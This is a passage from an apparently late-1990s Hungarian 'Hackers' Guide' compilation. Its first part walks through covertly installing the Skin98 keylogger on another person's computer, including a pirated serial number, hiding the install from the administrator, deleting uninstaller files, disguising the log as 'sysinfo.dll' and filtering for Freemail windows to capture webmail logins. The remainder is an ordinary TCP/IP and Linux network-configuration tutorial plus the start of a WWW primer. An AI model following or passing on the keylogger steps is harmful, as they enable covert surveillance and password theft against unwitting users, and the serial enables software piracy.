a SerialZ 2000-ben pedig nézzük meg a regisztrációs információkat (akinek nem<br />
lenne: Phrozen Crew 98 s/n: D6E9CC1D). Ha ez sikerült akkor installáljuk a<br />
programot. Az installálásnál ügyeljünk arra, hogy ne külön könyvtárba kerüljön,<br />
hanem direkt a Windows könyvtárba. Hogy miért? Mert ugye nem akarjuk a<br />
rendszergazda munkáját megkönyebbíteni :-). Sajnos a program a<br />
107
Hackers’ Guide<br />
Vezérlőpult/Programok hozzáadása menüben a Programok eltávolításához felrakta<br />
magát, tehát ha valaki mondjuk a dugig lévő gépről akar törölgetni, akkor száz, hogy<br />
evvel kezdi... A profibbak kiszedhetik a regisztrációs adatbázisból a lamerek inkább<br />
egyszerűen csak töröljék az UNINST.EXE-t meg az UNINST.LOG-ot...<br />
3. Az első lépésektől a totális hatalomig...<br />
Tehát sikerült az árulkodó jeleket eltakarítanunk. Két fontos fájlra hívnám fel a<br />
figyelmet. Az első az enlog.exe... Ennek segítségével fejthetjük vissza a log fájlt. A<br />
másik a skin98.exe, ez a keylogger. Indítsuk be a programot. Ekkor megjelenik egy<br />
ablak amiben hat kis fülecskét találunk.<br />
- Intercepts<br />
Intercept key pushes - Minden leütés mentése<br />
Intercept key pops - Kis és nagybetük mentése megkülönböztetve<br />
Intercept all printed symbols (a-z, 0-9,etc.) - Minden nyomtatott karakter mentése<br />
Intercept all system keys (Alt, etc.) - Minden rendszerbillentyű mentése (Alt, Tab stb.)<br />
Intercept all mouse clicks - Minden egérkattintás mentése<br />
Log file name - Itt a logfájlnév nevét kell megadnunk, mondjuk a Win könyvtárban<br />
egy sysinfo.dll-t :-) értelemszerűen<br />
- Logs<br />
Add Begin/END marks - A számítógép indítása/Kikapcsolása(vagy újraindítása) -nak<br />
rögzítése<br />
Add date to BEGIN/END marks - A számítógép indítása/Kikapcsolása(vagy<br />
újraindítása) dátumának rögzítése<br />
Add time to BEGIN/END marks - A számítógép indítása/Kikapcsolása(vagy<br />
újraindítása) idejének rögzítése<br />
Save window caption - Az ablak nevének elmentése<br />
Add task name to window caption - Az alkalmazás nevének elmentése<br />
Save text from window - Szöveg mentése az ablakban<br />
Save edit lines from window - Elmenti az "edit line"-ban (nem tudok most rá magyar<br />
megfelelőt) lévő szöveget<br />
Encrypt LOG file - Ennek segítségével felismerhetetlenné válik a log fájl egyszerű<br />
F3-ra<br />
Save Pastes from clipboard - A vágópadra másolt dolgokat elmenti<br />
Password for encrypting - A szükséges kód ahhoz, hogy újra felismerhető legyen a<br />
log...<br />
Edit lines to save - Hány sor után mentse a keylogger a dolgokat...<br />
- Change password<br />
Ezt gondolom nemkell bővebben elmagyaráznom... Kód beállítása azért, hogy ne<br />
nagyon tudja más elindítani a Skin'98 configuráló részét...<br />
- Scheduling<br />
Itt beállíthatjuk, hogy melyik nap hány órától hány óráig figyelje a gépet...<br />
- Filters<br />
Szürök... Megszűrhetjük, hogy mit logoljon a progi. Ha az Enable filters kivan pipálva<br />
akkor működik a szűrés... Program neve szerint (Task fiter mask) és az ablakok<br />
neve szerint(Window capture filter mask) szűrhetünk értelemszerűen. Mondjuk ha<br />
csak Freemail-re specializálódunk akkor *freemail* a Window capture filter maskban!<br />
108
Hackers’ Guide<br />
Ennyi lenne, ami most hirtelen vasárnap a kollégiumba való visszaindulás előtt egy<br />
órával megtudtam fogalmazni ezekről a hasznos programokról. Ha bármi kérdés<br />
felmerülne, akkor ne kiméljél a leveleiddel!<br />
************************************************************************************************<br />
Mi az IP, TCP/IP<br />
Néhány év(tized)-del ezelőtt az USA-ban megkezdődött a kutatói/katonai hálózat<br />
kialakulása az ún. ARPANET. Ez kezdetben néhány egyetemből és katonai<br />
intézményből épült fel és elsősorban kutatási célokat szolgált. A hálózathoz egyre<br />
több egyetem kapcsolódott, folyamatosan gyarapodott, és így alakult ki a ma már<br />
egyre jobban ismert Internet. Mivel az internet az ARPANET-ben gyökerezik, ezért<br />
logikus, hogy sokmindent át is vett onnan, például a az alapprotokollját a TCP/IP-t.<br />
Kezdjük először is a név magyarázatával. A TCP/IP, helyesebben írva IP/TCP,<br />
általában egy teljes protokollcsaládot jelent, ami magában foglalja az összes IP-re<br />
(Internet Protocol) épülő protokollt. A TCP (Transmission Control Protocol) ennek a<br />
családnak egy tagja (tegyük hozzá, hogy ezt használjuk leggyakrabban), de emelett<br />
rengeteg "testvére" van, mint például az UDP (User Datagram Protocol) vagy az<br />
ICMP (Internet Control Message Protocol).<br />
Az internet rendkívül heterogén hálózatokat fogott össze, ezért elsődleges cél volt az<br />
IP számára, hogy a fizikai médiumtól függetlenül, bárhol képes legyen működni.<br />
Ehhez egy olyan absztrakciós rétegre van szükseg, ami minden eszközön<br />
megvalósítható, és semmilyen eszközhöz nem köthető. Az IP-ben használható<br />
eszközöknek a következő követelményeknek kell megfelelniük:<br />
• képes legyen egy meghatározott mennyiségű byte-ot egyszerre átvinni (ezt<br />
hívjuk datagrammoknak, vagy csomagoknak)<br />
• képes legyen az eszköz alacsonyszintű (fizikai címét) leképezni egy logikai -<br />
IP - címre<br />
Mint láthatjuk a fenti két megkötést szinte minden lehetséges fizikai eszközön meg<br />
lehet valósítani, kezdve az ARCNet, Ethernet hálózatoktól az egyszerű nullmodemig.<br />
Az IP (=internet protokoll) állapotmentes protokoll, nem garantálja a packetek<br />
megérkezését a célhoz, sőt azt sem, hogy a packetek ugyanolyan sorrendben<br />
érkeznek meg, mint ahogyan elküldték őket. Ez tulajdonképpen annyit jelent, hogy a<br />
fizikai médium megpróbál megtenni a csomag célbajuttatása érdekében, de nem<br />
garantál semmit.<br />
109
Hackers’ Guide<br />
Egy IP csomag két részből áll: 1) fejléc információk, amelyek tartalmazzák a forrás<br />
és célcímet, valamint 2) adatrész, ami alkalmazás-specifikus. Az IP-re épülő protokoll<br />
az IP adatrészét használhatja felsőbb szintű fejléc, valamint adat számára. Így<br />
egymásba skatulyázhatók a csomagok, a felsőbb szintű protokollok használhatják<br />
azt, amit az alsó szintű add, de kiegészíthetik további tulajdonságokkal. Így jön a<br />
képbe a TCP.<br />
Mint láthatjuk az IP használata elég nehézkes az alkalmazások szempontjából,<br />
hiszen gondoskodniuk kell a csomagok sorbaállításáról, és az elvesző packetek<br />
újraküldéséről. Hogy ne kelljen minden alkalmazásban ezeket a funkciókat<br />
implementálni, ezért létrehozták a TCP protokollt, ami gondoskodik a csomagok<br />
sorrendbe allításáról, valamint az esetlegesen elvesző packetek ujraküldéséről. A<br />
TCP így már egy garantált csatornát biztosít a programunknak, hiszen gondoskodik<br />
arról, hogy ami a kapcsolat egyik végén "bement", az a másik végén ki is jön.<br />
Láthatjuk, hogy a TCP protokoll sokkal kényelmesebb az alkalmazások<br />
szempontjából, ezért majdnem minden magas szintű protokoll ezt használja (telnet,<br />
ftp stb). Ugyanakkor nem mindig van szükség a TCP-vel járó szolgáltatásokra, ezért<br />
kialakult más IP-re épült, de úgyanúgy nem kapcsolatjellegű protokoll. Erre<br />
jellemzően a kérdés-válasz jellegű kommunikációnál lehet szükség, amikor a<br />
visszaigazolást tulajdonképpen a válasz maga jelenti. Ilyen protokoll az UDP. Ezt a<br />
protokollt használja például a DNS (domain name service), vagy az NFS (network file<br />
system).<br />
Ezen kívül még léteznek más, IP-re épülő protokollok, ilyen az ICMP (=internet<br />
control message protocol), vagy az IGMP (=internet group multicast protocol).<br />
2. Címzés<br />
2.1. Host címek<br />
Mint korábban írtam az IP azonos felületet igyekszik adni minden hálózati eszköz<br />
felé. Ebben nagy szerepet játszik a címzés felépítése, ami minden fizikai médián<br />
logikai cím, és a logikai-fizikai cím közti összerendelést a protokoll végzi el.<br />
Megjegyzendő, hogy az IP cím és a hálózati eszköz fizikai címe között nincs<br />
összefüggés.<br />
Az IP cím egy 32 bites szám, ami 4 byte-nak felel meg. Írási formája a következő:<br />
192.168.2.1<br />
Ahol két pont között egy byte-nak megfelelő tízes számrendszerbeli szám van. Ez a<br />
cím az egész interneten (ill. az intraneten, hogy ha a nagy háló nem elérhető) egyedi.<br />
Minden hálózati eszköznek saját címe van, tehát ha egy számítógépben több<br />
hálózati eszköz van (több ethernet kártya pl) , akkor az a gép több címen is elérhető.<br />
A címen kívül a célgépen meg kell neveznünk egy szolgáltatást amit el kívánunk érni.<br />
Erre az ún. portcím szolgál, ami egy 16 bites szám. A portcímek egy része előre<br />
meghatározott szolgáltatásoknak van lefoglalva, például a 23-as port a telnet, 21-es<br />
az ftp, 25-ös pedig a levelezés számára foglalt.<br />
2.2. Network címek és a netmask<br />
A hálózaton nem csak a host-okat (számítógépeket, munkaállomásokat) azonosítják<br />
IP címmel, hanem a hálózatokat is. Egy IP szegmenst a network címe azonosít. Egy<br />
host neve úgy áll össze, hogy a cím elején levő bitek határozzák meg a hálózat<br />
110
Hackers’ Guide<br />
címét, a fennmaradó bitek pedig a host-ot azonosítják a hálózaton belül. Az, hogy<br />
melyik rész a network cím, és melyik azonosítja a host-ot a netmask határozza meg.<br />
A címnek azon bitjei, amiken a netmask bitjei 1-et tartalmaznak, a network címet<br />
határozzák meg, a fennmaradó bitek pedig a network-ön belüli hostcímet adják meg.<br />
Legyen a cím:<br />
|1. byte |2. byte |3. byte |4. byte |<br />
+---------------------------------------------------------------+<br />
|1|1|0|0|0|0|0|0|1|0|1|0|1|0|0|0|0|0|0|0|0|0|1|0|0|0|0|0|0|0|0|1| = 192.168.2.1<br />
+---------------------------------------------------------------+<br />
És a netmask:<br />
+---------------------------------------------------------------+<br />
|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|0|0|0|0|0|0|0|0| = 255.255.255.0<br />
+---------------------------------------------------------------+<br />
Tehát, ha a címünk 192.168.2.1, és a netmask 255.255.255.0, akkor a 192.168.2.0 a<br />
hálózati cím, a 192.168.2.1-nek az utolsó byteja (tehát az 1) pedig a host cím. Ebben<br />
az IP szegmensben 256 különböző cím szerepelhet, mégpedig 192.168.2.0 -<br />
192.168.2.255-ig. Ebből két címet fenntart magának a protokoll, mégpedig a<br />
192.168.2.0, ez a network cím, és a 192.168.2.255 ez pedig a broadcast cím, erről<br />
bővebben egy picit később.<br />
Ha tehát a 192.168.2.3-as címet akarjuk megcímezni, akkor a netmaskunkból látszik,<br />
hogy ez egy lokális cím, tehát közvetlenül címezhető.<br />
Ha viszont a 192.168.1.1-es címet szeretnénk elérni, a netmaskból látszik, hogy ez<br />
nem helyi cím, lokálisan nem kézbesíthető, ehhez a gateway-t (útválasztó)<br />
használjuk fel. Mi neki adjuk át a datagrammokat, a többiről pedig ő saját belső<br />
táblázataira támaszkodva gondoskodik.<br />
A netmask egy elég jó eszköz hálózatok feldarabolására, hiszen a használatával egy<br />
eredetileg 256 IP címes hálózatot fel lehet darabolni 16 db. 16 címesre, vagy 4 db.<br />
64 címesre, de akár 1 128 címesre + 2 db. 64 címesre. Ezt a technikát hívják<br />
subnetelésnek.<br />
2.3. Címosztályok<br />
Most, hogy már ismerjük a netmask fogalmát, könnyű lesz megértenünk az A, B és C<br />
címosztályokat. Az A osztályú cím az 1.0.0.0 - 126.255.255.255 címeket foglalja<br />
magába és netmaszkja 255.0.0.0 tehát egy IP szegmensben 2^24 (=16 millió) hostot<br />
képes megcímezni. A B osztályú címek 128.0.0.0 - 191.255.255.255 terjednek, és<br />
netmaskjuk 255.255.0.0 (2^16 = 65536 host). A C osztályú címek a 192.0.0.0 -<br />
223.255.255.255 címtartományban vannak, és netmaskjuk 255.255.255.0. A<br />
fennmaradó címtartomány foglalt későbbi fejlesztésekre. Ezeket a címtartományokat<br />
nem kell feltétlenül így használnunk, hiszen egy 15.1.2.3 címet is használhatunk<br />
255.255.255.0 netmaskal, és olyankor csak 256 helyi host létezik. Régen az<br />
útválasztók nem ismerték a netmask fogalmát, és csak címosztályok alapján tudtak<br />
routeolni. Ma a címosztály nem több adminisztrációs fogalomnál, illetve az egyes<br />
segédprogramok a címosztály alapján választanak alapértelmezést, de ezt bármikor<br />
átállíthatjuk.<br />
2.4. Localnet<br />
111
Hackers’ Guide<br />
Mint láthatjuk a fenti címfelosztásból kimaradt a 127.0.0.0/255.0.0.0 címtartomány.<br />
Ez az ún loopback-nek fenntartott rész. A loopback egy olyan áleszköz, ami a saját<br />
számítógépünket jelenti. Bármelyik cím a 127.0.0.0 tartományon belül a saját<br />
számítógépünkkel kommunikál.<br />
2.5. Broadcast cím<br />
Ezzel nem kell nagyon foglalkoznunk, a lényege az, hogy ezzel a címmel az összes<br />
helyi gépet megcímezhetjük, ún. körüzenetet küldhetünk ide, és azt az összes<br />
állomás venni fogja. A broadcast címnek foglalt az adott networkon megcímezhető<br />
legnagyobb hostcím. Tehát a címben a host részen csupa 1-es szerepel. Így a fenti<br />
192.168.2.0/255.255.255.0 tartományban a broadcast számára a foglalt a<br />
192.168.2.255 cím.<br />
2.6. Routolás<br />
Most már ismerünk IP címeket, netmaskokat, dehát hogyan is áll össze az egész<br />
hálózat? Erre próbálok rávilágítani ebben a fejezetben:<br />
Mint már mondtam, ha egy datagramm lokálisan nem kézbesíthető (tehát logikailag<br />
vagy fizikailag más közegben helyezkedik el), akkor az útválasztónak (gateway-nek)<br />
továbbítjuk ezt a packetet. Az útválasztónak kell eldöntenie, hogy egy adott<br />
packetnek merre kell tovább mennie. Ebben a feladatban rendelkezésre áll a cél IP<br />
cím, ill. egy belső táblázat az ún. routing tábla. (mint később láthatjuk sajat gépünkön<br />
is van ilyen tábla, de legtöbbször nem használjuk, csak a lokális háló számára van<br />
bejegyzés)<br />
Szóval a címek leírásánál már mondtam, hogy minden egyes hálózati eszköz kap<br />
egy IP címet, tehát ha a routerünknek két interface-e van, akkor neki két IP hálózatra<br />
van kijárása, számára két szegmensen is vannak közvetlenül elérhető hostok.<br />
Legyen most két IP szegmensünk, az egyik 192.168.1.xxx/255.255.255.0 (eth0<br />
eszközön keresztül), a másik pedig a 192.168.2.xxx/255.255.255.0 (az eth1<br />
eszközön keresztül). Így a routing tábla valahogy így nezne ki:<br />
Célcím Netmask Gateway Eszköz<br />
192.168.1.0 255.255.255.0 - eth0<br />
192.168.2.0 255.255.255.0 - eth1<br />
Így a routerünk meg tudja címezni mindkét IP szegmenst valamelyik eszközén<br />
keresztül. A megfelelő eszköz keresése valahogy úgy zajlik, hogy az első olyan<br />
routing bejegyzés eszköz mezője hivatkozik a keresett eszközre, aminek a<br />
tartományába a célcím beleesik.<br />
Van egy harmadik oszlop, ami a fenti két bejegyzésnél üres. Ezt az oszlopot<br />
használhatjuk fel annak megjelölésére, hogy a célcím nem lokálisan elérhető, de az<br />
adott szegmensen található gateway már tudja az utat a cél felé. Ilyen módon a<br />
gateway-ek összeláncolhatók.<br />
Vegyünk tehát fel egy olyan routing bejegyzést, amin keresztül az egesz internetet<br />
láthatjuk. Legyen ez mondjuk egy soros vonal (ppp0), a soros vonalon keresztül<br />
látunk egy gateway-t, ami az internet felé továbbítja a packeteket.<br />
Célcím Netmask Gateway Eszköz<br />
0.0.0.0 0.0.0.0 195.184.3.2 ppp0<br />
112
Hackers’ Guide<br />
Láthatjuk, hogy a netmask 0.0.0.0 tehát a teljes címtartományt lefedjük, azt is<br />
láthatjuk, hogy ezeket a kéréseket a ppp0-s eszközön kell továbbitani, ott pedig egy<br />
gateway-nek kell adnunk, akinek a címe 195.184.3.2.<br />
Ilyen módon épül fel az egész internet, minden kis helyi hálózat továbbitja a nem<br />
helyi packeteit egy olyannak, aki már tudja merre kell azt továbbítani.<br />
3. Linux<br />
Eddig általánosságban beszéltem a TCP/IP felépítéséről most szeretnék egy kicsit a<br />
Linux oldaláról közelíteni a témához.<br />
3.1. Interface-k<br />
Az interface-k tulajdonképpen a hálózati eszközöknek felelnek meg. Minden hálózati<br />
eszközt az ifconfig nevű programmal tudunk beállitani. Az általános szintaxis a<br />
következő:<br />
ifconfig netmask broadcast<br />
<br />
Ezek a legfontosabb paraméterek, bővebben lásd: man ifconfig. Az eszközök neve<br />
változó, főleg a típustól függ, általában:<br />
eth[0123456789] ethernet kártyák<br />
ppp[0123456789] ppp eszközök (soros vonali, pointopoint)<br />
sl[0123456789] slip eszközök (soros vonal)<br />
lo loopback eszköz<br />
Mielőtt ezeket az eszközöket használni tudnánk, a kernelbe be kell forditani a<br />
megfelelő drivereket.<br />
Ha az ifconfig-ot paraméterek nélkül hívjuk meg, akkor kiírja az aktuálisan<br />
felkonfigurált eszközök listáját:<br />
balabit:~$ ifconfig<br />
lo Link encap:Local Loopback<br />
inet addr:127.0.0.1 Bcast:127.255.255.255 Mask:255.0.0.0<br />
UP BROADCAST LOOPBACK RUNNING MTU:3584 Metric:1<br />
RX packets:97 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:97 errors:0 dropped:0 overruns:0 carrier:0 coll:0<br />
eth0 Link encap:Ethernet HWaddr 00:40:F6:58:A0:B3<br />
inet addr:193.6.40.37 Bcast:193.6.40.255 Mask:255.255.255.0<br />
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br />
RX packets:10936 errors:0 dropped:0 overruns:0 frame:974<br />
TX packets:3449 errors:0 dropped:0 overruns:0 carrier:0 coll:574<br />
Interrupt:10 Base address:0x300<br />
Ez megadja a beállítható paraméterek aktuális értékét, valamint néminemű<br />
statisztikai adatokkal szolgál.<br />
3.2. Routing tábla<br />
113
Hackers’ Guide<br />
A 2.5. fejezetben leírtak mint mondtam nem csak a gateway-ekre igaz, hiszen Linux<br />
alatt is kreálhatunk magunknak ilyen routing táblát, sőt egy Linux képes tökéletesen<br />
ellátni a router feladatait. A route tábla beállítását és lekérdezését a route parancs<br />
segítségével tudjuk megejteni.<br />
Indítsuk el paraméterek nélkül a route parancsot:<br />
balabit:~$ route<br />
Kernel IP routing table<br />
Destination Gateway Genmask Flags Metric Ref Use Iface<br />
193.6.40.0 * 255.255.255.0 U 0 0 6 eth0<br />
127.0.0.0 * 255.0.0.0 U 0 0 2 lo<br />
default rxkk.saturnus.v 0.0.0.0 UG 0 0 88 eth0<br />
Mit is jelent, amit látunk:<br />
Az eth0 eszközön keresztül látjuk a lokális hálózatot, ami a 193.6.40.0/255.255.255.0<br />
tartománynak felel meg. (ez az első sor)<br />
A 127.0.0.0/255.0.0.0 -n saját magunkat látjuk, ez a loopback.<br />
Az összes többi packet pedig, ami nem fér be a fenti két kategóriába a default-on<br />
megy keresztül, ami egy gateway-nek továbbít minden packetet.<br />
Új bejegyzéseket is vehetünk fel a route paranccsal. A szintaxis körülbelül a<br />
következő:<br />
route netmask dev <br />
3.3. Hálózati mintabeállítások<br />
Ebben a fejezetben konkrét példákat nézünk át, hogy adott konfigurációban hogyan<br />
kell beállítanunk a hálózatot a fenti ifconfig és route parancsok segítségével. Később<br />
a disztribúció specifikus beállításokat nézzük át, az újabb disztribúciók ugyanis<br />
sokkal egyszerűbbé teszik ezeket a beállításokat, és már kész scripteket adnak,<br />
amiket megfelelően felparaméterezve ugyanoda juthatunk, mint ha külön-külön<br />
kiadnánk a lenti parancsokat.<br />
3.3.1. Linux ethernet hálózaton<br />
Példa: A számítógépben egyetlen ethernet kártya van, és ezen keresztül éri el az<br />
internetet, és a lokális gépeket egyaránt. A helyi hálózat egy C osztályú IP<br />
szegmensen van.<br />
Megoldás: A gép IP címe a példa kedvéért legyen 192.168.2.1, a gateway legyen<br />
192.168.2.254. Ekkor a következő parancsokkal lehet beállítani a hálózatot:<br />
$ ifconfig eth0 192.168.2.1 netmask 255.255.255.0 broadcast 192.168.2.255<br />
network 192.168.2.0<br />
Ez beállítja az eth0 eszköz IP címét, a rajta keresztül elérhető hálózat maszkját, a<br />
körüzenet címét, és a hálózati címet.<br />
$ route add -net 192.168.2.0<br />
Ez beállítja a helyi hálózat route bejegyzését, így ezentúl a 192.168.2.xxx című<br />
hostokat el tudjuk érni.<br />
114
$ route add default gw 192.168.2.254<br />
Hackers’ Guide<br />
Ez pedig a lényeg: minden olyan csomag, amiről eddig nem rendelkeztünk, menjen a<br />
192.168.2.254-en levő útválasztóra.<br />
3.3.2. Linux modemes dialup-al<br />
Ma még - sajnos - nem jellemző az, hogy egy számítógép folyamatos kapcsolattal<br />
rendelkezzen a külvilág felé. Általános kapcsolódási módszer a telefonos hálózaton<br />
történő kapcsolódás. Ehhez legalább kétféle protokoll áll rendelkezésünkre:<br />
• SLIP (= Serial Line Internet Protocol)<br />
• PPP (= Point to Point Protocol)<br />
Az első egy egyszerű, de meglehetősen elavult protokoll, ma már egyre kevésbé<br />
használják, és sokkal inkább a második hódit tért. A PPP nem csak IP-t tud átvinni,<br />
hanem például IPX-et is, támogatja az azonosítást, és sokkal jobban definiált. A<br />
kapcsolat felvétel két fő lépésből áll:<br />
1. A modem-számítógép kommunikációja, tárcsázás, kapcsolatfelvétel<br />
2. Amennyiben a kapcsolat létrejött, az adatcsatorna átalakítása bináris<br />
kommunikációra, csomagok forgalmazása<br />
A számítógép a modemeket szöveges parancsokkal vezérli (ezek a Hayes féle<br />
modemvezérlő parancsok). Ha az adatkapcsolat létrejött, akkor kapunk egy terminált,<br />
amin egy login prompt utan az azonosítónkat, és a jelszavunkat begépelve shell-hez<br />
juthatunk a távoli gépen. Amennyiben azonban adatot szeretnénk forgalmazni, ahhoz<br />
a távoli kiszolgálógépen és a saját számítógépünkön is el kell indítanunk az<br />
adatkapcsolatot levezénylő programot. (ez PPP esetében a pppd). Például itt egy<br />
bejelentkezés modemen keresztül:<br />
ATZ
Hackers’ Guide<br />
Vár Válasz<br />
- ATZ<br />
OK ATDT501060<br />
login: bazsi<br />
password: xxxxx<br />
altair:~$ pppd<br />
Ezt a kérdés-válasz kommunikációt hívják chat-nek, és a leírását pedig chatscriptnek.<br />
A chat-script segítségével a teljes belépési folyamat automatizálható. A<br />
modemes dialup beállításához tehát létre kell hoznunk egy chat scriptet, amit<br />
megadva a pppd-nek felépíthető a kapcsolat. Ehhez a következő paraméterekkel kell<br />
indítanunk a pppd-t:<br />
balabit:~$ pppd /dev/modem modem lock connect /etc/ppp/chatscript defaultroute<br />
Nézzük a paraméterek jelentését:<br />
• /dev/modem: a modemünket jelképező eszköz. Ez általában egy symlink<br />
valamelyik soros portra (/dev/ttySxx)<br />
• modem: azt mondja meg a pppd-nek, hogy a modem vezérlő vonalakat be kell<br />
állítani (DTR, stb)<br />
• lock: azt jelenti, hogy a modemet lockolni kell (UUCP stílusú lock)<br />
• connect /etc/ppp/chatscript: ezzel adjuk meg a chat script nevét. Erről a<br />
scriptről bővebben később.<br />
• defaultroute: azt jelenti, hogy a pppd által felállított adatcsatorna legyen a<br />
default route bejegyzés, azaz minden csomag erre menjen kifelé.<br />
A fennt megadandó chat script standard inputjára és outputjára a modem kerül, tehát<br />
minden amit kiírunk azt megkapja a modem, és a modem által küldött adatokat<br />
olvashatjuk be. A chat scriptet a chat nevű programmal tudjuk "lejátszani". Tehát az<br />
"/etc/ppp/chatscript" nevű állományba a következőket kell írnunk:<br />
#!/bin/sh<br />
chat `` `ATZ` `OK` `ATDT501060` `login:` `bazsi` `password:` `xxxx` `altair:~$` `pppd`<br />
Így elértük célunkat, a kapcsolatfelvételt automatizáltuk.<br />
3.3.3. Hálózati eszközök beállítása RedHat alatt<br />
Redhat alatt nagyon jól megoldották az interface-k beállításást. Egyrészt mindent<br />
megtehetünk X-Window alól, a control-panel segítségével, másrészt a control-panel<br />
által generált állományokat is kitölthetjük az /etc/sysconfig/network-scripts alatt<br />
könyvtárban.<br />
Egy hálózati eszközhöz tartozó beállítások az ifcfg-eszknév nevű állományokban<br />
találhatók a fent megnevezett könyvtárban, tehát az eth0 eszköz adatai az<br />
/etc/sysconfig/network-scripts/ifcfg-eth0 állományban található. Minden ilyen<br />
állomány egy shell script, aminek a feladata néhány változónak a beállítása, ezért<br />
általában így néz ki:<br />
DEVICE=eth0<br />
IPADDR=195.184.3.121<br />
116
NETMASK=255.255.255.0<br />
NETWORK=195.184.3.0<br />
BROADCAST=195.184.3.255<br />
ONBOOT=yes<br />
BOOTPROTO=none<br />
Hackers’ Guide<br />
Általában a konkrét eszköz típusától függően további paramétereket is beállíthatunk,<br />
de a fentieket mindenhol értelmezik. Egy soros porthoz két állomány is tartozik az<br />
egyik az ifcfg-ppp0, a másik pedig az ehhez tartozó chat script (chat-ppp0). Egy<br />
soros porthoz tartozó ifcfg-ppp0 például így néz ki:<br />
PERSIST=no<br />
DEFROUTE=yes<br />
ONBOOT=no<br />
INITSTRING=ATZ<br />
MODEMPORT=/dev/modem<br />
LINESPEED=115200<br />
ESCAPECHARS=no<br />
DEFABORT=yes<br />
HARDFLOWCTL=yes<br />
DEVICE=ppp0<br />
PPPOPTIONS=<br />
DEBUG=no<br />
PAPNAME=bazsi<br />
REMIP=195.184.3.117<br />
IPADDR=195.184.3.121<br />
BOOTPROTO=none<br />
MTU=1500<br />
MRU=1500<br />
DISCONNECTTIMEOUT=<br />
RETRYTIMEOUT=<br />
USERCTL=yes<br />
Az egyes paraméterek jelentése értelemszerű, ezeknek a fileoknak a beállítását<br />
érdemesebb control-panellel végeznünk, az kitölti az összes mezőt a számunkra.<br />
3.3.4. Hálózati eszközök beállítása Debian alatt<br />
...<br />
3.3.5. Hálózati eszközök beállítása SuSe alatt<br />
...<br />
3.4. Nameserver beállítása<br />
A nevek IP címmé, valamint az IP címek nevekké fordítása az ún. DNS (domain<br />
name service) feladata. A DNS szerver-t általában a szolgáltatónk üzemelteti, és ő<br />
adja meg a szerver adatait is. (IP cím)<br />
Ezeket az adatokat az /etc/resolv.conf nevű fileban lehet megadni, ahol a következő<br />
kulcsszavak értelmezettek:<br />
117
Hackers’ Guide<br />
nameserver<br />
<br />
search<br />
domain1<br />
domain2<br />
A DNS IP címét adja meg.Többet is felsorolhatunk space-el<br />
elválasztva.<br />
Keresési zónákat adhatunk meg, amennyiben egy host a domain1 v.<br />
domain2 zónában van, akkor elég a zónán belüli nevét használnunk.<br />
(pl: proba.domain1 helyett elég proba-t írni)<br />
3.5. Nameserver nélküli beállítás<br />
Amennyiben a hálózatunkon nincsen nameserver, például nincs kapcsolatunk az<br />
internettel, akkor is szükségünk lehet név -> IP cím feloldásra. Ekkor alternatív<br />
megoldásként használhatjuk az /etc/hosts állományt. Ennek a formátuma:<br />
IP cím név/nevek<br />
127.0.0.1 localhost<br />
192.168.2.1 proba.domain.nev proba<br />
Ekkor a "proba.domain.nev" és a "proba" mindkettő a 192.168.2.1-es címhez lesz<br />
hozzárendelve.<br />
4. Szerzői jogok, és garancia<br />
Az ilyen dolgokat mindig is utáltam, de valamennyire szükség van rá. Szóval a<br />
dokumentum tartalmát illetően semmiféle garanciát nem vállalok, az itt levő<br />
bármelyik parancs begépelése földrengéseket, tűzvészeket okozhat, és akár<br />
megformázhatja a vinyódat (bár ilyen még soha nem történt), de erről én egyáltalán<br />
nem tehetek. Ha ezt nem hiszed el, akkor sajnos le kell tegyél e dokumentum<br />
bármilyen formában történő felhasználásáról.<br />
Copyright (c) 1998, Balázs Scheidler.<br />
A szerzői jogok engem, Scheidler Balázst, illetnek, és ezt az irományt 1998-ban<br />
követtem el, úgyhogy még legalább 70(*) évig az enyémek is maradnak. Minden jog<br />
engem illet, de kegyesen adok néhány jogot nektek is: tehát a dokumentumot<br />
elektronikus módon szabadon terjesztheted, amíg a fenti copyright sor a helyén<br />
marad. Egyéb terjesztésről egyénileg beszélhetünk.<br />
Amennyiben tanulsz valamit ebből a dokumentumból, és hasznodra válik, lógsz egy<br />
sörrel, amit egyszer majd BEHAJTOK. :-)<br />
Ja még annyit akartam írni, hogy megtalálsz a bazsi@balabit.hu e-mail címen,<br />
kritikát, bővítéseket, flame-t oda küldhetsz.<br />
* eredetileg itt 50 év állt, de Balogh Zsolt felvilagosított, hogy a szerzôi jogok az<br />
embert 70 évig illetik meg.<br />
************************************************************************************************<br />
118
A WORLD WIDE WEB<br />
Hackers’ Guide<br />
A World Wide Web (WWW vagy Web) a kliens/szerver modell alapján mûködik.<br />
Amikor tehát a Web-et használjuk, akkor tulajdonképpen két programot veszünk<br />
igénybe: a klienst és a szervert. A kliensprogram az, amelyik a lokális terminálunkon<br />
fut, ez a program jeleníti meg képernyõnkön az információkat, fogadja a<br />
billentyûleütéseket és az egérrel végrehajtott mûveleteket valamint visszakeresi az<br />
igényelt információt a szerveren.<br />
A szerverprogram abban a számítógépes rendszerben fut, amelyik a Web<br />
információt biztosítja. Várja a felhasználók igényeit és a kliensek számára az<br />
információkat biztosítja. A legtöbb esetben a felhasználónak csak az egyenlet<br />
második felével kell törõdnie, vagyis azzal, hogy miként mûködik a kliensprogram.<br />
Ugyanis ez az a program, amelyet használ, amellyel dolgozik és az a rész amelyet a<br />
szerver végez, láthatatlan számára. A Webbel kapcsolatos feladatok végrehajtása<br />
során a háttérben valószínûleg több különbözõ szerver fogja az igényeinket kezelni.<br />
A háttérben folyó mûveletek megemlítésének kizárólag csak az az oka, hogy ha<br />
valamelyik irat váratlanul hozzáférhetetlenné válik, akkor megértsük, hogy ennek az<br />
az oka, hogy egy olyan szerverrel próbáltuk meg fölvenni a kapcsolatot amelyik<br />
éppen nem üzemel.<br />
A Web sokféle információt kezel, amelyek általában a Hypertext Mark-up Language<br />
formátummal rendelkeznek. Ez a formátum azt jelenti, hogy a formázásra és a<br />
csatolásra vonatkozó kódok a szövegen belül helyezkednek el. A megfelelõ<br />
kliensprogram használatával az adott platform minden elõnye kihasználható. A<br />
Weben a hypertext-szolgáltatásokon kívül szinte minden Internet eszköz elérhetõ<br />
(FTP, Gopher, WAIS,Hírcsoport, Telnet).<br />
Talán a legelsõ web-lap volt a legegyszerûbb, ahol szinte csak szöveg volt, esetleg<br />
egy-egy kép a szöveg alátámasztására.A szövegben egy-két aláhúzott kék színû<br />
